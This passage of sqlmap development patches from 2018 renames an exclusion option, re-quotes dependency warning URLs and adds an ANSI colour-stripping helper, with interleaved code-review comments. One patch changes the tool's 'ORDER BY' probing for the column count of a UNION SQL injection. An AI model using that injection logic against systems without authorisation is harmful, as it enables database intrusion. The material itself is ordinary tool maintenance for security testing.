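Review bot: In the first dumpTable hunk the new exclusion check runs after `conf.db = conf.db.upper()` for Oracle, DB2 and HSQLDB, so a database named in lower or mixed case on `--exclude` no longer matches the upper-cased `conf.db` and is dumped anyway; the comparison should be case-insensitive, or the exclude entries should get the same normalization for those back-ends. The dumpAll hunk also reports its skip with `logger.info` while the two dumpTable hunks use `singleTimeLogMessage`, so the same event is logged differently depending on the entry point. dumpTable and dumpAll both start outside their hunks.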
@@ -530,8 +546,8 @@ def dumpFoundColumn(self, dbs, foundCols, colConsider): conf.tbl = table colList = filter(None, sorted(columns)) - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] conf.col = ','.join(colList) kb.data.cachedColumns = {} diff --git a/plugins/generic/search.py b/plugins/generic/search.py index b5d86042377..e07e98bf6eb 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -371,8 +371,8 @@ def searchColumn(self): infoMsgDb = "" colList = conf.col.split(',') - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] origTbl = conf.tbl origDb = conf.db diff --git a/sqlmap.conf b/sqlmap.conf index 77849ce719f..522e02df011 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -494,8 +494,8 @@ tbl = # Back-end database management system database table column(s) to enumerate. col = -# Back-end database management system database table column(s) to not enumerate. -excludeCol = +# Back-end database management system identifiers (database(s), table(s) and column(s)) to not enumerate. +exclude = # Pivot column name. pivotColumn = diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8c0dd8ba81f..2d513f00e57 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -39,14 +39,14 @@ c8551f7696a76450e6d139409e4f06cd lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -9eed2d4d370f375bda5e0c0488740e7f lib/core/optiondict.py -02c846bf9fddbcb75afed72c0d6b9bdc lib/core/option.py +63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py +785746cab318fe550d98c37296a0a888 lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -659fe726d16a8b4557d96d82181ace88 lib/core/settings.py +5c1731dff66559f45f9f6ab7d85335df lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -57,7 +57,7 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -a6912de35b7184e2e8b1fe2510c0c333 lib/parse/cmdline.py +27c4d3e568d199e01d1cffd37b370516 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 263ee1cec41facd2a06d0dc887b207ad lib/parse/headers.py 
@@ -153,14 +153,14 @@ da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -b2df2dfaa44659ac02df396fb2174d23 plugins/dbms/maxdb/enumeration.py +615be11d750530211af244b6ca6aef14 plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py 6439d15c1e8cdb069056c4fa725326df plugins/dbms/mssqlserver/connector.py -fdc3cc66d0d35f6ebee0dd625a87f4e9 plugins/dbms/mssqlserver/enumeration.py +a833fbc30ab1133bc6ba293d97d0ef7c plugins/dbms/mssqlserver/enumeration.py 7e495d786fa8e1da96e73e2905bbd7dd plugins/dbms/mssqlserver/filesystem.py 03d463c15ebbfa4e49155b261b59db31 plugins/dbms/mssqlserver/fingerprint.py affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py @@ -195,7 +195,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 6439d15c1e8cdb069056c4fa725326df plugins/dbms/sybase/connector.py -006b647e955d7638687d16e047e9c587 plugins/dbms/sybase/enumeration.py +31462dc5a1cd2a1b4eba6762d18fb48c plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 
@@ -203,14 +203,14 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py -315a3ced9667065b24de040af296037a plugins/generic/databases.py -b1bd764e8f417222ebb1890232290679 plugins/generic/entries.py +554f925e0a66f62b8ba39dd6c95d1e7f plugins/generic/databases.py +764a8fd5a99224910885c6b94a592170 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py ea0f3b9085061b272bfd98c13ad2d977 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py -8995e814cb8e854bd77534f687535014 plugins/generic/search.py +b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py e522c294676ede15bee751107e9bb449 plugins/generic/takeover.py 4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py From 8e8ae5228843ce50faa83aba72b9989f07bfab38 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Feb 2018 23:10:53 +0100 Subject: [PATCH 034/428] Minor text update --- lib/core/settings.py | 2 +- lib/utils/deps.py | 12 ++++++------ txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e4dad087f38..8b355eae53f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.11" +VERSION = "1.2.2.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/utils/deps.py b/lib/utils/deps.py index fd0d4e14e56..835cb3568b3 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -25,7 +25,7 @@ def checkDependencies(): if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": warnMsg = "'%s' third-party library must be " % data[1] warnMsg += "version >= 1.0.2 to work properly. " - warnMsg += "Download from %s" % data[2] + warnMsg += "Download from '%s'" % data[2] logger.warn(warnMsg) elif dbmsName == DBMS.MYSQL: __import__("pymysql") @@ -49,7 +49,7 @@ def checkDependencies(): except: warnMsg = "sqlmap requires '%s' third-party library " % data[1] warnMsg += "in order to directly connect to the DBMS " - warnMsg += "'%s'. Download from %s" % (dbmsName, data[2]) + warnMsg += "'%s'. Download from '%s'" % (dbmsName, data[2]) logger.warn(warnMsg) missing_libraries.add(data[1]) @@ -65,7 +65,7 @@ def checkDependencies(): except ImportError: warnMsg = "sqlmap requires 'python-impacket' third-party library for " warnMsg += "out-of-band takeover feature. Download from " - warnMsg += "http://code.google.com/p/impacket/" + warnMsg += "'http://code.google.com/p/impacket/'" logger.warn(warnMsg) missing_libraries.add('python-impacket') @@ -76,7 +76,7 @@ def checkDependencies(): except ImportError: warnMsg = "sqlmap requires 'python-ntlm' third-party library " warnMsg += "if you plan to attack a web application behind NTLM " - warnMsg += "authentication. Download from http://code.google.com/p/python-ntlm/" + warnMsg += "authentication. Download from 'http://code.google.com/p/python-ntlm/'" logger.warn(warnMsg) missing_libraries.add('python-ntlm') 
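Review bot: The impacket and python-ntlm download links re-quoted in the third and fourth hunks still point at `http://code.google.com/p/...`, a hosting service that was shut down in 2016, so the warning sends users to a dead page over plain HTTP. Since the strings are being edited anyway, replacing them with the projects' current upstream locations (impacket is maintained on GitHub) and using https would make the advice actionable; the pyreadline link on L87 is in the same state. checkDependencies starts outside the hunk.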
@@ -87,7 +87,7 @@ def checkDependencies(): except ImportError: warnMsg = "sqlmap requires 'websocket-client' third-party library " warnMsg += "if you plan to attack a web application using WebSocket. " - warnMsg += "Download from https://pypi.python.org/pypi/websocket-client/" + warnMsg += "Download from 'https://pypi.python.org/pypi/websocket-client/'" logger.warn(warnMsg) missing_libraries.add('websocket-client') @@ -101,7 +101,7 @@ def checkDependencies(): warnMsg += "be able to take advantage of the sqlmap TAB " warnMsg += "completion and history support features in the SQL " warnMsg += "shell and OS shell. Download from " - warnMsg += "http://ipython.scipy.org/moin/PyReadline/Intro" + warnMsg += "'http://ipython.scipy.org/moin/PyReadline/Intro'" logger.warn(warnMsg) missing_libraries.add('python-pyreadline') diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2d513f00e57..cfe951cd886 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5c1731dff66559f45f9f6ab7d85335df lib/core/settings.py +fea9bf09e60f66f4f0b1e9cac64dd842 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -101,7 +101,7 @@ c497003ecf231d03a311a816a6b3b753 lib/techniques/union/test.py e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py -985c737cd8a6a722160c55cf5ee224f4 lib/utils/deps.py +69c25da85a3a71a9798804075cdfd62b lib/utils/deps.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py 
From 5ff54bf9c621b56aad8fb882f93244071e285830 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Feb 2018 17:10:44 +0100 Subject: [PATCH 035/428] Fixes #2934 --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 12 ++++++------ txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8b355eae53f..faa3b38ff3a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.12" +VERSION = "1.2.2.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index ce659ec01e7..3d621e89860 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -48,7 +48,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= """ retVal = None - def _orderByTechnique(): + def _orderByTechnique(lowerCount, upperCount): def _orderByTest(cols): query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) query = agent.suffixQuery(query, suffix=suffix, comment=comment) 
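Review bot: `_orderByTechnique(lowerCount, upperCount)` gains two parameters whose `None` handling, and the `upperCount + 1` failing probe on L89, are only discoverable by reading the body; a docstring on the new signature would help, e.g. `"""Find the column count with ORDER BY probes; lowerCount/upperCount (None for defaults) bound the search, and ORDER BY upperCount + 1 is expected to fail."""`. The enclosing _findUnionCharCount starts outside the hunk.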
@@ -56,7 +56,7 @@ def _orderByTest(cols): page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) - if _orderByTest(1) and not _orderByTest(randomInt()): + if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): infoMsg = "'ORDER BY' technique appears to be usable. " infoMsg += "This should reduce the time needed " infoMsg += "to find the right number " @@ -64,10 +64,10 @@ def _orderByTest(cols): infoMsg += "range for current UNION query injection technique test" singleTimeLogMessage(infoMsg) - lowCols, highCols = 1, ORDER_BY_STEP + lowCols, highCols = 1 if lowerCount is None else lowerCount, ORDER_BY_STEP if upperCount is None else upperCount found = None while not found: - if _orderByTest(highCols): + if not conf.uCols and _orderByTest(highCols): lowCols = highCols highCols += ORDER_BY_STEP else: @@ -88,8 +88,8 @@ def _orderByTest(cols): kb.errorIsNone = False lowerCount, upperCount = conf.uColsStart, conf.uColsStop - if lowerCount == 1: - found = kb.orderByColumns or _orderByTechnique() + if lowerCount == 1 or conf.uCols: + found = kb.orderByColumns or _orderByTechnique(lowerCount, upperCount) if found: kb.orderByColumns = found infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cfe951cd886..050b6f121c0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
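Review bot: In the last hunk `found = kb.orderByColumns or _orderByTechnique(lowerCount, upperCount)` still lets a previously cached `kb.orderByColumns` short-circuit even when `conf.uCols` was given, so the user-supplied range presumably has no effect once an earlier probe has stored a count, possibly outside that range. Preferring the explicit range, `found = (None if conf.uCols else kb.orderByColumns) or _orderByTechnique(lowerCount, upperCount)`, would honour the option. In the third hunk, with `conf.uCols` set the `while` loop can only take its `else` branch, so a comment such as `# with --union-cols the bounds are fixed by the user, only narrow` would make the `not conf.uCols` guard less surprising. _findUnionCharCount starts and ends outside these hunks.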
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fea9bf09e60f66f4f0b1e9cac64dd842 lib/core/settings.py +7735e472a2d2661744bd6d04fd1c387d lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -96,7 +96,7 @@ b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 627ddc86a5a969e5509c7531c5c27a6c lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -c497003ecf231d03a311a816a6b3b753 lib/techniques/union/test.py +e58ab8029ffb2cc37e42d68747c4da39 lib/techniques/union/test.py 6c3c4c7d43ad75e61a73184323a81eac lib/techniques/union/use.py e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From f38596a5b30b890cc1f2aa4daf62a8e1799cd9d3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 20 Feb 2018 14:02:02 +0100 Subject: [PATCH 036/428] Minor refactoring --- lib/core/common.py | 17 ++++++++++++++++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 19 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 67631b110e1..f81cb1df979 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -889,6 +889,21 @@ def setColor(message, bold=False): return retVal +def clearColors(message): + """ + Clears ANSI color codes + + >>> clearColors("\x1b[38;5;82mHello \x1b[38;5;198mWorld") + 'Hello World' + """ + + retVal = message + + if message: + retVal = re.sub(r"\x1b\[[\d;]+m", "", message) + + return retVal + def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status=CONTENT_STATUS.IN_PROGRESS): """ Writes text to the stdout (console) stream @@ -1178,7 +1193,7 @@ def banner(): _ = BANNER if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv: - _ = re.sub("\033.+?m", "", _) + _ = clearColors(_) elif IS_WIN: coloramainit() diff --git a/lib/core/settings.py b/lib/core/settings.py index faa3b38ff3a..625e335ec7f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.13" +VERSION = "1.2.2.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 050b6f121c0..3a13b83de66 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -17ab0324cb992a781cc197ec8c0209d7 lib/core/common.py +32a77cc3fc2d26d26f469ab8eb35efed lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
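Review bot: The pattern `r"\x1b\[[\d;]+m"` in clearColors does not match the bare reset sequence `\x1b[m` (no parameters), which terminals accept and which the old `"\033.+?m"` in banner did strip, so one valid SGR code can survive the call; `retVal = re.sub(r"\x1b\[[\d;]*m", "", message)` closes that gap. The narrower pattern also no longer touches non-SGR escape sequences, which is fine for the banner but is a behaviour change from the second hunk and deserves a sentence in the docstring. `dataToStdout` at the end of the first hunk continues outside it.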
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7735e472a2d2661744bd6d04fd1c387d lib/core/settings.py +feb9124da962dd30ab7fcecc4a60f5d3 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 24cc6e92e949125e486401d80c204025367f6b1a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 20 Feb 2018 14:26:31 +0100 Subject: [PATCH 037/428] Trivial update --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index f81cb1df979..5b74d90eec8 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3307,7 +3307,7 @@ def unhandledExceptionMessage(): errMsg += "reproduce the bug. The " errMsg += "developers will try to reproduce the bug, fix it accordingly " errMsg += "and get back to you\n" - errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] + errMsg += "Running version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] errMsg += "Python version: %s\n" % PYVERSION errMsg += "Operating system: %s\n" % platform.platform() errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap\.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=sys.stdin.encoding)) diff --git a/lib/core/settings.py b/lib/core/settings.py index 625e335ec7f..dafa1d54238 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
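Review bot: The report text assembled here, including the `Command line:` line two below the changed one, embeds the full `sys.argv` and is what users are asked to send to the developers, so any `--auth-cred`, `--cookie` or `--proxy` credentials and session tokens given on the command line end up in the bug report verbatim. A redaction pass over the joined argv for the credential-carrying options before formatting, with a comment such as `# strip secrets from argv before it is echoed into the report`, would keep the report useful without leaking them. unhandledExceptionMessage starts and ends outside the hunk.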
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.14" +VERSION = "1.2.2.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3a13b83de66..42cdfa958b4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -32a77cc3fc2d26d26f469ab8eb35efed lib/core/common.py +62580fa31d29a79aa1e4715e425a147c lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -feb9124da962dd30ab7fcecc4a60f5d3 lib/core/settings.py +0c204b9aa8cc9637a6ef495ea603935e lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 67f8c22702b0494881dbc890027892ca8c925460 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 21 Feb 2018 11:47:01 +0100 Subject: [PATCH 038/428] Fixes #2942 --- lib/core/option.py | 5 ++++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index e3ace6ec65f..d2dc4eaf17f 100644 --- a/lib/core/option.py +++ b/lib/core/option.py 
@@ -1648,7 +1648,10 @@ def _cleanupOptions(): conf.rParam = [] if conf.paramDel and '\\' in conf.paramDel: - conf.paramDel = conf.paramDel.decode("string_escape") + try: + conf.paramDel = conf.paramDel.decode("string_escape") + except ValueError: + pass if conf.skip: conf.skip = conf.skip.replace(" ", "") diff --git a/lib/core/settings.py b/lib/core/settings.py index dafa1d54238..e5eba1210ce 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.15" +VERSION = "1.2.2.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 42cdfa958b4..7a705fc3f36 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py -785746cab318fe550d98c37296a0a888 lib/core/option.py +12f9b2435f4967562770be248cf50843 lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0c204b9aa8cc9637a6ef495ea603935e lib/core/settings.py +f80eeded0ed77a678dd7a69d6a8fd3ae lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From b595b883d1bdc3815de29fb900d551a1c405e604 Mon Sep 17 00:00:00 2001 
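Review bot: The new `except ValueError: pass` in `_cleanupOptions` swallows a malformed escape sequence in the user-supplied `--param-del` value without any diagnostic, so the option is silently kept with its literal backslashes and the user gets no hint why the delimiter never matched. Keeping the best-effort behaviour but making the fallback visible is a one-line change, assuming `logger` is in scope in this module: `except ValueError:` / `logger.debug("unable to unescape --param-del value, using it literally")`. `_cleanupOptions` starts and ends outside the hunk.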
From: Miroslav Stampar Date: Sun, 25 Feb 2018 17:39:21 +0100 Subject: [PATCH 039/428] Temporary patch for #2947 --- lib/core/settings.py | 2 +- sqlmap.py | 8 ++++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e5eba1210ce..4b9a44d4c29 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.16" +VERSION = "1.2.2.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 0c1e160f8fa..d8c236da193 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -297,6 +297,14 @@ def main(): logger.error(errMsg) raise SystemExit + elif "url = url.strip()" in excMsg: + dataToStdout(excMsg) + print + errMsg = "please contact 'miroslav@sqlmap.org' with details for this issue " + errMsg += "as he is trying to reproduce it for long time" + logger.error(errMsg) + raise SystemExit + elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"): raise SystemExit diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7a705fc3f36..21877d09f89 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f80eeded0ed77a678dd7a69d6a8fd3ae lib/core/settings.py +616fd4427943e75033dcf128e11fcaff lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py 
